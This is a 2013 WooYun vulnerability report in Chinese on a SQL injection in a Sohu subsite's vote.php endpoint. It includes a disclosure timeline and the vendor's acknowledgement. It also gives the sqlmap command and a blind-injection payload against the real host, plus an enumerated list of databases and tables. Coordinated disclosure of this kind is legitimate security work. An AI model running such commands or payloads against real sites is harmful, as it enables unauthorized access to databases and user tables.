当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-035455

漏洞标题:搜狐分站sql注入之三(大量数据)

相关厂商:搜狐

漏洞作者: feng

提交时间:2013-08-28 09:02

修复时间:2013-10-12 09:03

公开时间:2013-10-12 09:03

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-28: 细节已通知厂商并且等待厂商处理中
2013-08-29: 厂商已经确认,细节仅向厂商公开
2013-09-08: 细节向核心白帽子及相关领域专家公开
2013-09-18: 细节向普通白帽子公开
2013-09-28: 细节向实习白帽子公开
2013-10-12: 细节向公众公开

简要描述:

搜狐分站sql注入之三(大量数据)

详细说明:

[root@Hacker~]# Sqlmap -u "http://product.it.sohu.com/core/vote.php" --data "action=comment&pid=344043&vote=vote4&page="
Place: POST
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=comment&pid=344043 AND 2254=2254&vote=vote4&page=
---
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0

漏洞证明:

应厂商要求,不能泄露数据,贴些数据库和表以作证明
available databases [7]:
[*] act
[*] down
[*] information_schema
[*] stock
[*] t
[*] tv
[*] zoldb
Database: tv
[17 tables]
+---------------------------------------+
| area |
| article |
| category |
| counts |
| evaluate_result |
| evaluates |
| manufacturer |
| merchant |
| merchant_area |
| param_category |
| params |
| product_param |
| product_param_bac |
| product_property |
| products |
| serials |
| sys_user |
+---------------------------------------+
Database: down
[36 tables]
+---------------------------------------+
| x_adaptprojects |
| x_backyard_downediting |
| x_backyard_groups |
| x_backyard_logs |
| x_backyard_sessions |
| x_backyard_users |
| x_cates |
| x_channels |
| x_dev_accesslog |
| x_dev_keyvalue |
| x_developers |
| x_downfields |
| x_downhistories |
| x_downpushs |
| x_downrelates |
| x_downs |
| x_files |
| x_groups |
| x_images |
| x_languages |
| x_mobiles |
| x_mobiles_useragent |
| x_mtc_users |
| x_pages |
| x_projects |
| x_rates |
| x_reports |
| x_reporttypes |
| x_sessions |
| x_sets |
| x_stats_5m |
| x_stats_agent |
| x_stats_day |
| x_stats_day_channel |
| x_stats_search |
| x_vendors |
+---------------------------------------+
Database: t
[6 tables]
+---------------------------------------+
| stat_user_byday |
| sync_job |
| sync_queue |
| sync_sina_media |
| sync_sina_t |
| sync_sina_user |
+---------------------------------------+

修复方案:

你们专业

版权声明:转载请注明来源 feng@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-08-29 00:13

厂商回复:

感谢支持。^_^

最新状态:

暂无